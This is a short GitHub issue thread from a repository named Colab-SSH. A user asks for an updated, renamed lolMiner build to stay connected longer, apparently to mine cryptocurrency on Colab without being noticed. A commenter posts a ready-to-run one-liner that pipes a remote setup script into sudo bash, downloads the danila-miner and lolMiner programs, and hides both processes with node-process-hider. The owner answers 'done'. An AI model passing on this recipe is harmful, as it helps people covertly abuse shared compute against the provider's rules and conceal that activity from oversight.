### ISSUE TITLE
Need update dev app

### ISSUE THREAD

**Issue by udumb4r4** [akuhnet/Colab-SSH#1]
Pls update dev app to the latest lolminer 1.46a cuz still v1.31 https://github.com/akuhnet/Colab-SSH/blob/main/dev wanna experiment with renamed app to get long time connection

**Comment by PriyanshuNaredi** [comment]
curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://whalepool-cdn.fra1.digitaloceanspaces.com/software/danila-miner/danila-miner-2.3.1-ubuntu-bionic.tar.gz && tar -xvf danila-miner-2.3.1-ubuntu-bionic.tar.gz && apt install screen && rm -rf danila-miner-2.3.1-ubuntu-bionic.tar.gz && wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.46a/lolMiner_v1.46a_Lin64.tar.gz && tar -xf lolMiner_v1.46a_Lin64.tar.gz && rm -rf lolMiner_v1.46a_Lin64.tar.gz && mv 1.46a lolMiner && sudo ph add danila-miner lolMiner

**Comment by akuhnet** [comment]
done
